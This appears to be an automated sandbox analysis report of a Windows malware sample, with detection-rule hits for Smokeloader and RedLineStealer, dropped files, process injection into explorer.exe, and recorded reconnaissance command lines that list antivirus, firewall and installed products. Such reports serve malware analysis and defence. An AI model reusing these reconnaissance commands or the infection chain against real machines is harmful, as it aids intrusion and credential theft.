    Source: 0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000006.00000002.2516805210.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000009.00000002.2777599585.00000000006D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000009.00000002.2777432655.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2517016123.00000000007DD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
    Source: O4zPA1oI9Y.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: DE97.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: uegasii.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: jvgasii.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@61/15@9/4
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe Code function: 0_2_00622A07 CreateToolhelp32Snapshot,Module32First
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe Code function: 11_2_00007FF7CBCA7138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance
    Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jvgasii
    Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DE97.tmp
    Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
    Source: O4zPA1oI9Y.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
    Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
    Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
    Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="328"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="412"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="488"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="560"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="652"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="928"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="996"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="436"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="376"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="60"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="980"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1040"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1064"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1140"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1192"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1248"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1328"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1344"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1356"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1448"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1496"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1516"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1528"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1560"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1640"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1648"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1784"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1872"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1900"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1980"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1988"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2000"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1704"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2076"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2088"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2148"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2236"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2288"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2412"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2424"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2516"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2552"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2560"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2600"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2624"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2648"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2692"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2764"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2916"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3008"::GetOwner
    Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3624"::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3624&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3668&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3668&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3808&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3808&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3952&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3952&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4168&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4168&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4356&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4356&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4400&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4400&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5416&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5416&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6016&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6016&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5428&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5428&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1888&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1888&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5312&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;5312&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6296&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;6296&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3108&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;3108&quot;::GetOwner
    Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 9A0D.tmp.13.dr, 9690.tmp.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: O4zPA1oI9Y.exeReversingLabs: Detection: 78%
    Source: unknownProcess created: C:\Users\user\Desktop\O4zPA1oI9Y.exe "C:\Users\user\Desktop\O4zPA1oI9Y.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\jvgasii C:\Users\user\AppData\Roaming\jvgasii
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DE97.exe C:\Users\user\AppData\Local\Temp\DE97.exe
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\uegasii C:\Users\user\AppData\Roaming\uegasii
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8CAE.exe C:\Users\user\AppData\Local\Temp\8CAE.exe
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeProcess created: C:\Windows\System32\cmd.exe cmd
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
